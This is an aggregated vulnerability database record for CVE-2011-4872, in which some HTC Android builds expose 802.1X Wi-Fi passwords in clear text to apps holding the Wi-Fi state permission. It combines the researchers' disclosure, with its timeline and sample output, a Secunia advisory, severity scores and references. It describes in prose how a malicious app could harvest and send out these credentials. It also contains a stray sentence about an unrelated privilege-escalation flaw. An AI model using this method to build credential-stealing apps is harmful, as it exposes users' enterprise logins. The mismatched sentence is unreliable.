ID

VAR-201202-0161


CVE

CVE-2011-4872


TITLE

Multiple HTC Devices 'Android.permission.ACCESS_WIFI_STATE' Information Disclosure Vulnerability

Trust: 0.9

sources: CNVD: CNVD-2012-0389 // BID: 51790

DESCRIPTION

Multiple HTC Android devices including Desire HD FRG83D and GRI40, Glacier FRG83, Droid Incredible FRF91, Thunderbolt 4G FRG83D, Sensation Z710e GRI40, Sensation 4G GRI40, Desire S GRI40, EVO 3D GRI40, and EVO 4G GRI40 allow remote attackers to obtain 802.1X Wi-Fi credentials and SSID via a crafted application that uses the android.permission.ACCESS_WIFI_STATE permission to call the toString method on the WifiConfiguration class. A user's 802.1X WiFi credentials and SSID information may be exposed to any application with basic WiFi permissions on certain HTC builds of Android. HTC Made Android On the device, Wi-Fi There is a vulnerability in which authentication information is leaked. HTC Made Android The device has a problem managing authentication information, Wi-Fi There is a vulnerability in which authentication information is leaked.Configured for the product by a remote third party Wi-Fi Authentication information may be obtained. If the same application also has android.permission.INTERNET permission, the application can collect this information and send it to the server on the remote Internet. Multiple HTC devices are prone to an information-disclosure vulnerability. An attacker can exploit this issue by enticing an unsuspecting victim to install a malicious application with 'android.permission.ACCESS_WIFI_STATE' and 'android.permission.INTERNET' permissions on the device running Android. Remote attackers can exploit this issue to gain access to sensitive information. This may aid in further attacks.   This exploit exposes enterprise-privileged credentials in a manner that allows targeted exploitation. -------------------------------------------------------------------------------- Affected Vendors: -------------------------------------------------------------------------------- HTC -------------------------------------------------------------------------------- Affected Versions: -------------------------------------------------------------------------------- We have verified the following devices as having this issue (there may be others including some non-HTC phones): Desire HD  (both "ace" and "spade" board revisions) - Versions FRG83D, GRI40 Glacier - Version FRG83 Droid Incredible - Version FRF91 Thunderbolt 4G - Version FRG83D Sensation Z710e - Version GRI40 Sensation 4G - Version GRI40 Desire S - Version GRI40 EVO 3D - Version GRI40 EVO 4G - Version GRI40 -------------------------------------------------------------------------------- Non-Affected Versions: -------------------------------------------------------------------------------- myTouch3g  (Appears to run either unmodified, or only lightly modified Android build) Nexus One  (Runs unmodified Android build) -------------------------------------------------------------------------------- Severity -------------------------------------------------------------------------------- Critical -------------------------------------------------------------------------------- See also -------------------------------------------------------------------------------- CVE ID: CVE-2011-4872 -------------------------------------------------------------------------------- Timeline: -------------------------------------------------------------------------------- - 2012-02-01: Public disclosure - 2012-01-31: Submit final public disclosure doc to HTC Global for feedback - 2012-01-31: HTC publishes information via their web site - 2012-01-20: Public disclosure ? postponed - 2012-01-19: Discussion with HTC Global on their time schedule - 2012-01-05: Conference call with HTC Global - 2012-01-02: Public disclosure ? postponed - 2011-12-05: Discussed public disclosure time frames with HTC and Google - 2011-10-11: Updated all individuals and groups that are aware of the issue - 2011-10-11: Follow-up conference call with HTC Global and Google - 2011-09-19: Updated all individuals and groups that were aware of the issue - 2011-09-19: Conference call with HTC Global and Google - 2011-09-08: HTC and Google verified exploit - 2011-09-07: Notified key government agencies and CERT under non-public disclosure - 2011-09-07: Initial email and phone call with HTC Global and Google -------------------------------------------------------------------------------- Vulnerability Details: -------------------------------------------------------------------------------- There is an issue in certain HTC builds of Android that can expose the user's 802.1X password to any program with the "android.permission.ACCESS_WIFI_STATE" permission. In addition, if the SSID is an identifiable SSID ("Sample University" or "Enterprise XYZ"), this issue exposes enterprise-privileged credentials in a manner that allows targeted exploitation. The resulting output will look something like this: * ID: 2 SSID: "ct" BSSID: null PRIO: 16 KeyMgmt: WPA_EAP IEEE8021X Protocols: WPA RSN AuthAlgorithms: PairwiseCiphers: CCMP GroupCiphers: WEP40 WEP104 TKIP CCMP PSK: eap: PEAP phase2: auth=MSCHAPV2 identity: [Your User Name] anonymous_identity: password: client_cert: private_key: ca_cert: keystore://CACERT_ct On most Android devices, the password field is either left blank, or simply populated with a "*" to indicate that a password is present. However, on affected HTC devices, the password field contains the actual user password in clear text. This is sample output from a Sprint EVO running Android 2.3.3: * ID: 0 SSID: "wpa2eap" BSSID: null PRIO: 21 KeyMgmt: WPA_EAP IEEE8021X Protocols: WPA RSN AuthAlgorithms: PairwiseCiphers: CCMP GroupCiphers: WEP40 WEP104 TKIP CCMP PSK: eap: TTLS phase2: auth=PAP identity: test anonymous_identity: password: test client_cert: private_key: ca_cert: keystore://CACERT_wpa2eap -------------------------------------------------------------------------------- Vendor Response -------------------------------------------------------------------------------- Google and HTC have been very responsive and good to work with on this issue.   Google has made changes to the Android code to help better protect the credential store and HTC has released updates for all currently supported phone and side-loads for all non-supported phone. Customer with affected versions can find information from HTC about updating their phone at: http://www.htc.com/www/help/ Google has also done a code scan of every application currently in the Android Market and there are no applications currently exploiting this vulnerability. -------------------------------------------------------------------------------- Credit -------------------------------------------------------------------------------- Chris Hessing from The Open1X Group (http://www.open1x.org) who is currently working on Android, iOS, Windows, Mac OSX, and Linux 802.1X tools for Cloudpath Networks (http://www.cloudpath.net/) discovered this password exploit. -------------------------------------------------------------------------------- Contact Information -------------------------------------------------------------------------------- Chris Hessing      Senior Engineer, Cloudpath Networks (chris.hessing@cloudpath.net)      Chief Architect, Open1X Group (chris@open1x.org) Bret Jordan CISSP      Senior Security Architect, Open1X Group (jordan@open1x.org) -------------------------------------------------------------------------------- About -------------------------------------------------------------------------------- Cloudpath Networks Cloudpath Networks provides software solutions that allow diverse environments to operate WPA2-Enterprise and 802.1X networks in a scalable, sustainable manner.ˇ From Bring Your Own Device (BYOD) in enterprise to student-owned devices in education, Cloudpath's XpressConnect Wizard has been proven to provide unmatched simplicity on millions of devices around the globe. XpressConnect is an automated, self-service wizard for connecting users to WPA2-Enterprise and 802.1X across a wide range of device types and authentication methods, including credential-based (PEAP and TTLS) and certificate-based (TLS).ˇ For certificate-based environments, XpressConnect?s integration technology seamlessly connects to existing Microsoft CA servers to extend automated certificate issuance to non-domain devices, including iOS (iPhone, iPad, iPod Touch), Android, Windows, Mac OS X, and Linux. The Open1X Group The Open1X Group is a strategic research and development group established in 2001 to support the creation and adoption of secure authentication systems over traditionally insecure network connection. The Open1X Group performs active and ongoing research and analysis in to the IEEE 802.1X protocol, the IETF EAP Methods, emerging authentication technologies, and various cryptographic implementations.   The Open1X Group has had the support of major Universities, enterprise companies, major Hi-Tech companies, and non-profit organizations.   The Open1X Group also performs on-going analysis of business and academic interests in to secure authentication and single sign-on systems, and Government and non-Government regulations and mandates for compliance in secure authentication. The Open1X Group leverages a distributed team of security architects, engineers, and research scientists with specializations in 802.1X, gird and high performance computing, wireless networking, federated authentication, black box testing, cryptography, large enterprise and University deployment experiences, and global project development. The Open1X Group is a pioneer in the secure authentication space with the first major wide spread 802.1X federated deployment back in 1999/2000, and the development of a fully featured 802.1X supplicant, XSupplicant. Bret Jordan CISSP Sr Security Architect PGP Fingerprint: 62A6 5999 0F7D 0D61 4C66 D59C 2DB5 111D 63BC A303 "Without cryptography vihv vivc ce xhrnrw, however, the only thing that can not be unscrambled is an egg." . The vulnerability is caused due to an unspecified error and can be exploited by an application system administrator to gain super user privileges. The vulnerability is reported in versions 6.0, 6.5, and 6.6. SOLUTION: Apply patches (please see the vendor's advisory for details). ---------------------------------------------------------------------- SC Magazine awards the Secunia CSI a 5-Star rating Top-level rating for ease of use, performance, documentation, support, and value for money. Read more and get a free trial here: http://secunia.com/blog/296 ---------------------------------------------------------------------- TITLE: HTC Products Wi-Fi Credentials Disclosure Weakness SECUNIA ADVISORY ID: SA47837 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/47837/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=47837 RELEASE DATE: 2012-02-02 DISCUSS ADVISORY: http://secunia.com/advisories/47837/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/47837/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=47837 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Open1X Group has reported a weakness in multiple HTC products, which can be exploited by malicious people to disclose potentially sensitive information. The weakness is caused due to the "WifiConfiguration::toString()" method returning Wi-Fi credentials of stored networks in clear text. Successful exploitation requires that a malicious application is installed with "android.permission.ACCESS_WIFI_STATE" permissions. PROVIDED AND/OR DISCOVERED BY: Chris Hessing, Open1X Group. ORIGINAL ADVISORY: HTC: http://www.htc.com/www/help/ Open1X Group: http://blog.mywarwithentropy.com/2012/02/8021x-password-exploit-on-many-htc.html US-CERT VU#763355: http://www.kb.cert.org/vuls/id/763355 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Trust: 3.42

sources: NVD: CVE-2011-4872 // CERT/CC: VU#763355 // JVNDB: JVNDB-2012-001308 // CNVD: CNVD-2012-0389 // BID: 51790 // PACKETSTORM: 109344 // PACKETSTORM: 109394 // PACKETSTORM: 109362

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2012-0389

AFFECTED PRODUCTS

vendor:htcmodel:desire hdscope:eqversion:gri40

Trust: 2.4

vendor:htcmodel:sensation z710escope:eqversion:gri40

Trust: 1.6

vendor:htcmodel:droid incrediblescope:eqversion:frf91

Trust: 1.6

vendor:htcmodel:sensation 4gscope:eqversion:gri40

Trust: 1.6

vendor:htcmodel:thunderbolt 4gscope:eqversion:frg83d

Trust: 1.6

vendor:htcmodel:glacierscope:eqversion:frg83

Trust: 1.6

vendor:htcmodel:desire hdscope:eqversion:frg83d

Trust: 1.6

vendor:htcmodel:evo 4gscope:eqversion:gri40

Trust: 1.6

vendor:htcmodel:evo 3dscope:eqversion:gri40

Trust: 1.6

vendor:htcmodel:desire sscope:eqversion:gri40

Trust: 1.6

vendor:htcmodel:desire hdscope:eqversion:0

Trust: 0.9

vendor:htcmodel:thunderbolt 4g frg83dscope: - version: -

Trust: 0.9

vendor:htcmodel:sensation z710e gri40scope: - version: -

Trust: 0.9

vendor:htcmodel:sensation 4g gri40scope: - version: -

Trust: 0.9

vendor:htcmodel:glacier frg83scope: - version: -

Trust: 0.9

vendor:htcmodel:evo 4g gri40scope: - version: -

Trust: 0.9

vendor:htcmodel:evo 3d gri40scope: - version: -

Trust: 0.9

vendor:htcmodel:droid incredible frf91scope: - version: -

Trust: 0.9

vendor:htcmodel:desire s gri40scope: - version: -

Trust: 0.9

vendor:htcmodel: - scope: - version: -

Trust: 0.8

vendor:htcmodel:desire hdscope:eqversion:(ace and spade) - versions frg83d

Trust: 0.8

vendor:htcmodel:desire sscope:eqversion:- version gri40

Trust: 0.8

vendor:htcmodel:droid incrediblescope:eqversion:- version frf91

Trust: 0.8

vendor:htcmodel:evo 3dscope:eqversion:- version gri40

Trust: 0.8

vendor:htcmodel:evo 4gscope:eqversion:- version gri40

Trust: 0.8

vendor:htcmodel:glacierscope:eqversion:- version frg83

Trust: 0.8

vendor:htcmodel:sensation 4gscope:eqversion:- version gri40

Trust: 0.8

vendor:htcmodel:sensation z710escope:eqversion:- version gri40

Trust: 0.8

vendor:htcmodel:thunderbolt 4gscope:eqversion:- version frg83d

Trust: 0.8

sources: CERT/CC: VU#763355 // CNVD: CNVD-2012-0389 // BID: 51790 // JVNDB: JVNDB-2012-001308 // CNNVD: CNNVD-201202-043 // NVD: CVE-2011-4872

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2011-4872
value: LOW

Trust: 1.0

CARNEGIE MELLON: VU#763355
value: 1.23

Trust: 0.8

NVD: CVE-2011-4872
value: LOW

Trust: 0.8

CNNVD: CNNVD-201202-043
value: LOW

Trust: 0.6

nvd@nist.gov: CVE-2011-4872
severity: LOW
baseScore: 2.6
vectorString: AV:N/AC:H/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: HIGH
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 4.9
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

sources: CERT/CC: VU#763355 // JVNDB: JVNDB-2012-001308 // CNNVD: CNNVD-201202-043 // NVD: CVE-2011-4872

PROBLEMTYPE DATA

problemtype:CWE-200

Trust: 1.8

sources: JVNDB: JVNDB-2012-001308 // NVD: CVE-2011-4872

THREAT TYPE

remote

Trust: 0.7

sources: PACKETSTORM: 109344 // CNNVD: CNNVD-201202-043

TYPE

information disclosure

Trust: 0.6

sources: CNNVD: CNNVD-201202-043

CONFIGURATIONS

sources: JVNDB: JVNDB-2012-001308

PATCH

title:HTC Help Center - WiFi security fixurl:http://www.htc.com/www/help/#w1307647922146

Trust: 0.8

title:Patch for multiple HTC devices 'Android.permission.ACCESS_WIFI_STATE' information disclosure vulnerabilityurl:https://www.cnvd.org.cn/patchInfo/show/8691

Trust: 0.6

sources: CNVD: CNVD-2012-0389 // JVNDB: JVNDB-2012-001308

EXTERNAL IDS

db:CERT/CCid:VU#763355

Trust: 3.6

db:NVDid:CVE-2011-4872

Trust: 3.4

db:BIDid:51790

Trust: 1.9

db:SECUNIAid:47837

Trust: 1.8

db:JVNDBid:JVNDB-2012-001308

Trust: 0.8

db:SECUNIAid:47860

Trust: 0.7

db:CNVDid:CNVD-2012-0389

Trust: 0.6

db:BUGTRAQid:20120201 802.1X PASSWORD EXPLOIT ON MANY HTC ANDROID DEVICES

Trust: 0.6

db:NSFOCUSid:18651

Trust: 0.6

db:CNNVDid:CNNVD-201202-043

Trust: 0.6

db:PACKETSTORMid:109344

Trust: 0.1

db:PACKETSTORMid:109394

Trust: 0.1

db:PACKETSTORMid:109362

Trust: 0.1

sources: CERT/CC: VU#763355 // CNVD: CNVD-2012-0389 // BID: 51790 // JVNDB: JVNDB-2012-001308 // PACKETSTORM: 109344 // PACKETSTORM: 109394 // PACKETSTORM: 109362 // CNNVD: CNNVD-201202-043 // NVD: CVE-2011-4872

REFERENCES

url:http://blog.mywarwithentropy.com/2012/02/8021x-password-exploit-on-many-htc.html

Trust: 2.8

url:http://www.kb.cert.org/vuls/id/763355

Trust: 2.8

url:http://www.securityfocus.com/bid/51790

Trust: 1.6

url:http://secunia.com/advisories/47837

Trust: 1.6

url:http://archives.neohapsis.com/archives/bugtraq/2012-02/0002.html

Trust: 1.6

url:http://www.htc.com/www/help/

Trust: 1.0

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4872

Trust: 0.8

url:http://jvn.jp/cert/jvnvu763355

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4872

Trust: 0.8

url:http://blog.mywarwithentropy.com/2012/02/8021x-password-exploit-on-many-htc.htmlhttp

Trust: 0.6

url:http://secunia.com/advisories/47860

Trust: 0.6

url:http://www.nsfocus.net/vulndb/18651

Trust: 0.6

url:http://www.htc.com/www/

Trust: 0.3

url:http://secunia.com/vulnerability_intelligence/

Trust: 0.2

url:http://secunia.com/advisories/secunia_security_advisories/

Trust: 0.2

url:http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/

Trust: 0.2

url:http://secunia.com/advisories/about_secunia_advisories/

Trust: 0.2

url:http://secunia.com/vulnerability_scanning/personal/

Trust: 0.2

url:http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org

Trust: 0.2

url:http://secunia.com/blog/296

Trust: 0.2

url:http://www.cloudpath.net/)

Trust: 0.1

url:http://www.open1x.org)

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2011-4872

Trust: 0.1

url:http://archives.neohapsis.com/archives/bugtraq/2012-02/att-0005/esa-2012-009.txt

Trust: 0.1

url:http://secunia.com/advisories/47860/#comments

Trust: 0.1

url:https://ca.secunia.com/?page=viewadvisory&vuln_id=47860

Trust: 0.1

url:http://secunia.com/advisories/47860/

Trust: 0.1

url:http://secunia.com/advisories/47837/

Trust: 0.1

url:https://ca.secunia.com/?page=viewadvisory&vuln_id=47837

Trust: 0.1

url:http://secunia.com/advisories/47837/#comments

Trust: 0.1

sources: CERT/CC: VU#763355 // CNVD: CNVD-2012-0389 // BID: 51790 // JVNDB: JVNDB-2012-001308 // PACKETSTORM: 109344 // PACKETSTORM: 109394 // PACKETSTORM: 109362 // CNNVD: CNNVD-201202-043 // NVD: CVE-2011-4872

CREDITS

Chris Hessing and Bret Jordan

Trust: 0.9

sources: BID: 51790 // CNNVD: CNNVD-201202-043

SOURCES

db:CERT/CCid:VU#763355
db:CNVDid:CNVD-2012-0389
db:BIDid:51790
db:JVNDBid:JVNDB-2012-001308
db:PACKETSTORMid:109344
db:PACKETSTORMid:109394
db:PACKETSTORMid:109362
db:CNNVDid:CNNVD-201202-043
db:NVDid:CVE-2011-4872

LAST UPDATE DATE

2024-08-14T14:14:37.863000+00:00


SOURCES UPDATE DATE

db:CERT/CCid:VU#763355date:2012-02-01T00:00:00
db:CNVDid:CNVD-2012-0389date:2012-02-03T00:00:00
db:BIDid:51790date:2012-02-01T00:00:00
db:JVNDBid:JVNDB-2012-001308date:2012-02-07T00:00:00
db:CNNVDid:CNNVD-201202-043date:2012-02-06T00:00:00
db:NVDid:CVE-2011-4872date:2012-02-16T05:00:00

SOURCES RELEASE DATE

db:CERT/CCid:VU#763355date:2012-02-01T00:00:00
db:CNVDid:CNVD-2012-0389date:2012-02-03T00:00:00
db:BIDid:51790date:2012-02-01T00:00:00
db:JVNDBid:JVNDB-2012-001308date:2012-02-07T00:00:00
db:PACKETSTORMid:109344date:2012-02-02T02:00:50
db:PACKETSTORMid:109394date:2012-02-02T06:44:24
db:PACKETSTORMid:109362date:2012-02-02T03:31:21
db:CNNVDid:CNNVD-201202-043date:1900-01-01T00:00:00
db:NVDid:CVE-2011-4872date:2012-02-05T11:55:03.047